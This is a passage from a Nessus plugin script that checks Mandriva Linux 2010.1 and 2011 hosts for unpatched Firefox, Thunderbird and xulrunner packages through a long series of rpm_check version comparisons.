value:\"cpe:/o:mandriva:linux:2011\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-af-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ar-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ast-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-be-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-bg-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-bn_BD-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-bn_IN-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-br-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-bs-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ca-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-cs-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-cy-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-da-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-de-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-devel-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-el-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-en_GB-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-en_ZA-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-eo-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-es_AR-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-es_CL-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-es_ES-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-es_MX-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-et-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-eu-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-fa-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-fi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-fr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-fy-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ga_IE-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-gd-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-gl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-gu_IN-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-he-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-hi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-hr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-hu-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-hy-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-id-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-is-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-it-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ja-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-kk-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-kn-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ko-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ku-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-lg-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-lt-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-lv-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-mai-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-mk-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ml-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-mr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-nb_NO-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-nl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-nn_NO-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-nso-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-or-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-pa_IN-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-pl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-pt_BR-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-pt_PT-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ro-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ru-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-si-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-sk-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-sl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-sq-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-sr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-sv_SE-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ta-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-ta_LK-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-te-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-th-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-tr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-uk-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-vi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-zh_CN-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-zh_TW-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"firefox-zu-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64xulrunner-devel-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64xulrunner10.0.4-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libxulrunner-devel-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libxulrunner10.0.4-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ar-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-be-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-bg-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-bn_BD-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-br-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ca-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-cs-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-da-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-de-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-el-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-en_GB-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-ar-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-ca-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-cs-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-de-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-el-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-es-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-fi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-fr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-it-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-ja-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-ko-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-nb-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-nl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-pl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-pt-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-pt_BR-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-ru-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-sl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-sv-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-tr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-vi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-zh_CN-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-enigmail-zh_TW-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-es_AR-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-es_ES-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-et-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-eu-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-fi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-fr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-fy-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ga-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-gd-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-gl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-he-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-hu-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-id-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-is-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-it-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ja-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ko-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-lightning-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-lt-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-nb_NO-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-nl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-nn_NO-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-pl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-pt_BR-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-pt_PT-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ro-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ru-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-si-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-sk-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-sl-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-sq-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-sv_SE-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-ta_LK-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-tr-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-uk-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-vi-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-zh_CN-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"mozilla-thunderbird-zh_TW-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"nsinstall-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"xulrunner-10.0.4-0.1mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-af-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ar-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ast-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-be-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bg-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bn_BD-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bn_IN-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-br-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-bs-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ca-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-cs-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-cy-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-da-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-de-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-devel-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-el-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-en_GB-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-en_ZA-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-eo-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-es_AR-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-es_CL-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-es_ES-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-es_MX-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-et-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-eu-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fa-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-fy-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-ga_IE-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-gd-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-gl-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-gu_IN-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-he-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hi-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hr-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hu-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"firefox-hy-12.0-0.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", 